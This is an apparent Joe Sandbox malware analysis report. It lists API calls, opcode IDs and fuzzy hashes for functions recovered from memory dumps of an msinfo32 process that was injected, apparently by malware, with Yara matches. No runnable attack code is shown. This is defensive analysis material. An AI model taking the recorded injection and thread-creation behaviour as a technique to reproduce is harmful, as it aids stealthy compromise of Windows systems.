                                                                                                        • Instruction Fuzzy Hash: 63E04F362502147BD510AA59DC11F9B775EDBC6760F008055FA08AB240C671791187F5
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2658456540.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F39000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F3D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004FAE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_4e10000_msinfo32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: dbd8a44a03da6a98df38a6c054061f1cf21091c2c1c7dc3c40aa514d5a860bf8
                                                                                                        • Instruction ID: 22910530974eddf532a40ae7df8257f8f9e5c1480f35be8a652b614e9ad9dfaa
                                                                                                        • Opcode Fuzzy Hash: dbd8a44a03da6a98df38a6c054061f1cf21091c2c1c7dc3c40aa514d5a860bf8
                                                                                                        • Instruction Fuzzy Hash: 0B90023161550402F5407158451570610459BD1205F65D411A082956DD87D5DE5165A6
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2658456540.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F39000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F3D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004FAE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_4e10000_msinfo32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 71915600f73691c5ba8431d9bcc7976b87944377331bb473042a9d853250009f
                                                                                                        • Instruction ID: 443ec216603e8f371b61eb46e24e89fdecdf24638d8b9c4bce067ab7e6a13ea0
                                                                                                        • Opcode Fuzzy Hash: 71915600f73691c5ba8431d9bcc7976b87944377331bb473042a9d853250009f
                                                                                                        • Instruction Fuzzy Hash: E3900271611500426580715848054066045ABE2305395D115A0959565C8658DD55926D
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2658456540.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F39000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F3D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004FAE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_4e10000_msinfo32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: fd0510c7285bfa77dcfe9f2be6303be148f17d959e0d2a9cba3b3aaa53663aa2
                                                                                                        • Instruction ID: 10e31b4db01d31b12e90c1ea644ec470850a4fed45c74d74d96215e5dd01f37d
                                                                                                        • Opcode Fuzzy Hash: fd0510c7285bfa77dcfe9f2be6303be148f17d959e0d2a9cba3b3aaa53663aa2
                                                                                                        • Instruction Fuzzy Hash: 4690023161580012B580715848855464045ABE1305B55D011E0829559C8A54DE565365
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2658456540.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F39000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F3D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004FAE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_4e10000_msinfo32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 8cc45c7acc8993398c35485a3d9bcecfa1a0f43b98866e6d22f9778343e0e9df
                                                                                                        • Instruction ID: 2726095e8aaaddefb069a507497fdc9f6527065055db0d72f037e654a9acd8fc
                                                                                                        • Opcode Fuzzy Hash: 8cc45c7acc8993398c35485a3d9bcecfa1a0f43b98866e6d22f9778343e0e9df
                                                                                                        • Instruction Fuzzy Hash: BA90023121140402F5407598540964600459BE1305F55E011A542955AEC6A5DD916135
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2658456540.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F39000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F3D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004FAE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_4e10000_msinfo32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 76720a2299b938372ea99d2cf6d67395d1cc6b054bbc31d2fde9d35a3b1dcef5
                                                                                                        • Instruction ID: e5411c629a4f91b1196a70c7f0235dfc801c21dea08c9752807fee4f1d19e56a
                                                                                                        • Opcode Fuzzy Hash: 76720a2299b938372ea99d2cf6d67395d1cc6b054bbc31d2fde9d35a3b1dcef5
                                                                                                        • Instruction Fuzzy Hash: 1890023125545102F590715C44056164045BBE1205F55D021A0C19599D8595DD556225
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2658456540.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F39000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F3D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004FAE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_4e10000_msinfo32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 64c70c0527dac747a10f2d31885c31d4fb78a91da53359f5a00d6325b8a6d558
                                                                                                        • Instruction ID: 883e0bdf43bc31f5b1df41b664f9423182012fe4e6f7fb83153ae1cd6b59f6b0
                                                                                                        • Opcode Fuzzy Hash: 64c70c0527dac747a10f2d31885c31d4fb78a91da53359f5a00d6325b8a6d558
                                                                                                        • Instruction Fuzzy Hash: A4900235231400022585B558060550B0485ABD7355395D015F181B595CC661DD655325
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2658456540.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F39000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F3D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004FAE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_4e10000_msinfo32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 41d8d6cb7d278ede1e8f041a12d0a286f9b647bcb66ceed2fa901eae4d5249d5
                                                                                                        • Instruction ID: aee1b9f36975cf86948c937e168b1a3a8a0dce842bc04253e7995b316db0f440
                                                                                                        • Opcode Fuzzy Hash: 41d8d6cb7d278ede1e8f041a12d0a286f9b647bcb66ceed2fa901eae4d5249d5
                                                                                                        • Instruction Fuzzy Hash: 11900235221400032545B558070550700869BD6355355D021F141A555CD661DD615125
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2658456540.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F39000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F3D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004FAE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_4e10000_msinfo32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 031ab05cd5aa3cd0fe7090bb2b3465b30aa0f0ff5c87ed239c2f13a62fe7741d
                                                                                                        • Instruction ID: f2de3ed51983b340e8fdac9d01db6b18708fd85ecd914e5e488bf89fb5fbeaa2
                                                                                                        • Opcode Fuzzy Hash: 031ab05cd5aa3cd0fe7090bb2b3465b30aa0f0ff5c87ed239c2f13a62fe7741d
                                                                                                        • Instruction Fuzzy Hash: 8390023121544842F58071584405A4600559BD1309F55D011A0469699D9665DE55B665
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2658456540.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F39000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F3D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004FAE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_4e10000_msinfo32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: b4b657525b05cdf9726ae573b4248a28570b0342803c11302a1a867f7a2941b2
                                                                                                        • Instruction ID: af4b55e0ac6b4beb92f205a3c19af337e689d4f44edcdac97bd21b9533a9b585
                                                                                                        • Opcode Fuzzy Hash: b4b657525b05cdf9726ae573b4248a28570b0342803c11302a1a867f7a2941b2
                                                                                                        • Instruction Fuzzy Hash: FF90023121140802F5C07158440564A00459BD2305F95D015A042A659DCA55DF5977A5
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2658456540.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F39000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F3D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004FAE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_4e10000_msinfo32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: d144b5402be8477f277db4495731f6ae90b46c8fde9c580fe03b4e13736626e6
                                                                                                        • Instruction ID: 803d8961accdc918a8744488a122f00857cdfda9411ebdef0dda45e73cbfb941
                                                                                                        • Opcode Fuzzy Hash: d144b5402be8477f277db4495731f6ae90b46c8fde9c580fe03b4e13736626e6
                                                                                                        • Instruction Fuzzy Hash: 5C90023161540802F5907158441574600459BD1305F55D011A0429659D8795DF5576A5
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2658456540.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F39000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F3D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004FAE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_4e10000_msinfo32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 2dc200e5734845558dee7f7456d2b8362308af2ab80272f187516fabeeadd7bc
                                                                                                        • Instruction ID: 73fe4c267dbe126a85c6ebae0798d6e20786779c4f9d5f291bc1d3f9d73f39ad
                                                                                                        • Opcode Fuzzy Hash: 2dc200e5734845558dee7f7456d2b8362308af2ab80272f187516fabeeadd7bc
                                                                                                        • Instruction Fuzzy Hash: 0990027121240003654571584415616404A9BE1205B55D021E1419595DC565DD916129
                                                                                                        APIs
                                                                                                        • Sleep.KERNELBASE(000007D0), ref: 02EC3FEC
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2655932579.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_2ea0000_msinfo32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Sleep
                                                                                                        • String ID: net.dll$wininet.dll
                                                                                                        • API String ID: 3472027048-1269752229
                                                                                                        • Opcode ID: 20f5863090913fda4a4d8d76cf0f9b980cd708cbc9a8521cf3ac1590dab34810
                                                                                                        • Instruction ID: b5b83685bf6d6198adc521d17d354247f0109c479166ea172600a8339c768cff
                                                                                                        • Opcode Fuzzy Hash: 20f5863090913fda4a4d8d76cf0f9b980cd708cbc9a8521cf3ac1590dab34810
                                                                                                        • Instruction Fuzzy Hash: 5F31AEB0A40305BBD714DFA4C981FEBBBB9FB88714F10911CF619AB280D770A641CBA5
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2655932579.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_2ea0000_msinfo32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: InitializeUninitialize
                                                                                                        • String ID: @J7<
                                                                                                        • API String ID: 3442037557-2016760708
                                                                                                        • Opcode ID: da3671b576c4b8232daada8dc48475daebfe1aa8067eabe2b1ff9e2fd6f50097
                                                                                                        • Instruction ID: 25d7ce9195736fbbbc0c9bdd8b5adee19e6ebc6389d4ebabe46ac53e0806faca
                                                                                                        • Opcode Fuzzy Hash: da3671b576c4b8232daada8dc48475daebfe1aa8067eabe2b1ff9e2fd6f50097
                                                                                                        • Instruction Fuzzy Hash: B93110B5A0060A9FDB04DFD8CC809EFB7B9BF89304B108559E915EB214D775AE458BA0
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2655932579.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_2ea0000_msinfo32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: InitializeUninitialize
                                                                                                        • String ID: @J7<
                                                                                                        • API String ID: 3442037557-2016760708
                                                                                                        • Opcode ID: 30a6f71531db7879e2b48e1c328765ffd192768e7c297fe30202571279af61f3
                                                                                                        • Instruction ID: 730f14579ad5ea23e45bdec3fc63dc9554cfa99ec958b31b5df0d0d4dcf871dd
                                                                                                        • Opcode Fuzzy Hash: 30a6f71531db7879e2b48e1c328765ffd192768e7c297fe30202571279af61f3
                                                                                                        • Instruction Fuzzy Hash: BE3130B5A0060A9FDF04DFD8CC809EFB7B9BF89304B108559E915EB214D775EE458BA0
                                                                                                        APIs
                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02EB4AA2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2655932579.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_2ea0000_msinfo32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Load
                                                                                                        • String ID:
                                                                                                        • API String ID: 2234796835-0
                                                                                                        • Opcode ID: 338fb922ceddde9226d705a8cb496d73f5e40924b2cd7384f96b55a7a640d4f7
                                                                                                        • Instruction ID: 822918a8af10cbe032d70c2aeb9794e511ac0618699e97d9c53618915228cfcf
                                                                                                        • Opcode Fuzzy Hash: 338fb922ceddde9226d705a8cb496d73f5e40924b2cd7384f96b55a7a640d4f7
                                                                                                        • Instruction Fuzzy Hash: AC017677B882239ACB21CF68A810B89B7A1EF41135F0043A9EF54DB0C2D762B41582C0
                                                                                                        APIs
                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02EB4AA2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2655932579.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_2ea0000_msinfo32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Load
                                                                                                        • String ID:
                                                                                                        • API String ID: 2234796835-0
                                                                                                        • Opcode ID: 13b91c398fb724290a6bfd8f40c1848a49aab752f183ec829ec08b07cc2e30f9
                                                                                                        • Instruction ID: d69acb1c23b58ddc6fd93fe1ba9671cdddbf9035f21f65d5cde836464628ea5c
                                                                                                        • Opcode Fuzzy Hash: 13b91c398fb724290a6bfd8f40c1848a49aab752f183ec829ec08b07cc2e30f9
                                                                                                        • Instruction Fuzzy Hash: C4010CB5D8020DABDF10EAE4DD41FDEB3B99F44308F1091A9E91897281F671EB15CB91
                                                                                                        APIs
                                                                                                        • CreateProcessInternalW.KERNELBASE(?,?,?,?,02EB87EE,00000010,?,?,?,00000044,?,00000010,02EB87EE,?,?,?), ref: 02EC9DB3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2655932579.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_2ea0000_msinfo32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateInternalProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 2186235152-0
                                                                                                        • Opcode ID: 95e7944543cce5b2c4fbb0de41b98fbcbaf21c039efe1640ebc56405684a71b4
                                                                                                        • Instruction ID: 316fdd62aeb794141f5f38085f3ad037c21605cbd2192cd1b59553bad5f0f906
                                                                                                        • Opcode Fuzzy Hash: 95e7944543cce5b2c4fbb0de41b98fbcbaf21c039efe1640ebc56405684a71b4
                                                                                                        • Instruction Fuzzy Hash: F801D6B2200108BFCB44DE89DC90EDB77ADAF8C714F508108BA09D7240D630FC51CBA4
                                                                                                        APIs
                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02EA9E75
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2655932579.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_2ea0000_msinfo32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 2422867632-0
                                                                                                        • Opcode ID: d7bea970cb2dd02f5888197e3ca89e3e7c40e668faaa9cc91417caf7ca6dc594
                                                                                                        • Instruction ID: d6077b36e620cac132b53023419f7ad688ab71f878f408fa91b212215e9b7f5f
                                                                                                        • Opcode Fuzzy Hash: d7bea970cb2dd02f5888197e3ca89e3e7c40e668faaa9cc91417caf7ca6dc594
                                                                                                        • Instruction Fuzzy Hash: 63F065733C130436D22071E99C02FD7769D8B80765F144425F71CDF1C0D996B44147E5
                                                                                                        APIs
                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02EA9E75
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2655932579.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_2ea0000_msinfo32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 2422867632-0
                                                                                                        • Opcode ID: 8125d97770903c71304435f1bdf6abcc95fc4969b556bd5d8f27794463d539d9
                                                                                                        • Instruction ID: 3d73b14eccae981967a48873b90cf5971cb4517924a85bc285082c908bf49c49
                                                                                                        • Opcode Fuzzy Hash: 8125d97770903c71304435f1bdf6abcc95fc4969b556bd5d8f27794463d539d9
                                                                                                        • Instruction Fuzzy Hash: 13F092723C13043AD23062E98C43FDB6B5E8F81761F258518F758EF2C1C9A6B4428BE5
                                                                                                        APIs
                                                                                                        • RtlFreeHeap.NTDLL(00000000,00000004,00000000,19CBA06B,00000007,00000000,00000004,00000000,02EB42AA,000000F4), ref: 02EC9CFC
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2655932579.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_2ea0000_msinfo32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FreeHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 3298025750-0
                                                                                                        • Opcode ID: 11ee6f4fe670e68b04c4fbcf4560fcc96f2033ae1d980ac49e5d81d080f95a0c
                                                                                                        • Instruction ID: b9c54359611ac624cefb7fc7516545e2842e6996348b084b6509710cb7e0469c
                                                                                                        • Opcode Fuzzy Hash: 11ee6f4fe670e68b04c4fbcf4560fcc96f2033ae1d980ac49e5d81d080f95a0c
                                                                                                        • Instruction Fuzzy Hash: 2AE06D722002047FD610EF99EC40F9B37AEDF85720F008119F908AB241C631B810CBB5
                                                                                                        APIs
                                                                                                        • RtlAllocateHeap.NTDLL(02EB1F39,?,02EC5FD1,02EB1F39,02EC5AFF,02EC5FD1,?,02EB1F39,02EC5AFF,00001000,?,?,00000000), ref: 02EC9CAC
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2655932579.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_2ea0000_msinfo32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocateHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 1279760036-0
                                                                                                        • Opcode ID: c052594ec9451208ac238e65e670723ed15c2a3c5389a19f5b1804f41d85aef9
                                                                                                        • Instruction ID: be375e7c164aaabae0be697fdbfc163ef58d56cec6e50fe20b765f43d89259a9
                                                                                                        • Opcode Fuzzy Hash: c052594ec9451208ac238e65e670723ed15c2a3c5389a19f5b1804f41d85aef9
                                                                                                        • Instruction Fuzzy Hash: 5CE06D722002087FD610EE98DC40F9B37ADEF89720F108019F908AB240D630B9108BB5
                                                                                                        APIs
                                                                                                        • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 02EB885C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2655932579.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_2ea0000_msinfo32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AttributesFile
                                                                                                        • String ID:
                                                                                                        • API String ID: 3188754299-0
                                                                                                        • Opcode ID: a8276470a365cd753f11b640662ee6e5bf72edccbabd521c85cc8e52512c2c73
                                                                                                        • Instruction ID: 2e4a989fed245e9340c2fa8cfe8aeeb655de4e11cf3880975d54cd2500811eee
                                                                                                        • Opcode Fuzzy Hash: a8276470a365cd753f11b640662ee6e5bf72edccbabd521c85cc8e52512c2c73
                                                                                                        • Instruction Fuzzy Hash: 0CE048716803041BEF2495E9AC45BA6335C5F44A28F648550B95CDB3C1D678E5014250
                                                                                                        APIs
                                                                                                        • SetErrorMode.KERNELBASE(00008003,?,?,02EB2220,02EC843E,02EC5AFF,02EB21EA), ref: 02EB8653
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2655932579.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_2ea0000_msinfo32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorMode
                                                                                                        • String ID:
                                                                                                        • API String ID: 2340568224-0
                                                                                                        • Opcode ID: 889deb6e2cad98ca0813545c3eb581fcd9d858b092a0b49321b68ddadf1b5444
                                                                                                        • Instruction ID: 2092e2d32883c5cd7928ea3d16156efd464a889172e9a7ddd15e42c31fbe4f41
                                                                                                        • Opcode Fuzzy Hash: 889deb6e2cad98ca0813545c3eb581fcd9d858b092a0b49321b68ddadf1b5444
                                                                                                        • Instruction Fuzzy Hash: 55D05E757C03053BE611E6E88C06F5A328D5B90758F05C468BB0CDB3C2ED65F1008A65
                                                                                                        APIs
                                                                                                        • PostThreadMessageW.USER32(?,00000111,00000000,00000000), ref: 02EB131D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2655932579.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_2ea0000_msinfo32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: MessagePostThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 1836367815-0
                                                                                                        • Opcode ID: 8ec3775f0e40b3bee5156ff5a0e22553932c57dfa4200919125e76a782e4c981
                                                                                                        • Instruction ID: 5b186c067b6b4d996d5784d7207d58f7c4c8f02748098ed4574aaeb9de7d5f24
                                                                                                        • Opcode Fuzzy Hash: 8ec3775f0e40b3bee5156ff5a0e22553932c57dfa4200919125e76a782e4c981
                                                                                                        • Instruction Fuzzy Hash: DBD0A732B8021C70EE2241906C42FFF776C8F41E50F004067FB04F80C1E681140506A5
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2658456540.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F39000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F3D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004FAE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_4e10000_msinfo32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 25c70e8e9b9ea6a29f75033cf777a239f688f4a8b7847e4a9cc5520567e08795
                                                                                                        • Instruction ID: 1fb16b0ab076ddb8d9461d1205edb047a39be2b2ee4452fe808e470ebe807dd3
                                                                                                        • Opcode Fuzzy Hash: 25c70e8e9b9ea6a29f75033cf777a239f688f4a8b7847e4a9cc5520567e08795
                                                                                                        • Instruction Fuzzy Hash: 33B02B318014C0C5FF00F720060871739007BD0304F15C0A1D3070246E0338D0C0F175
                                                                                                        Memory Dump Source
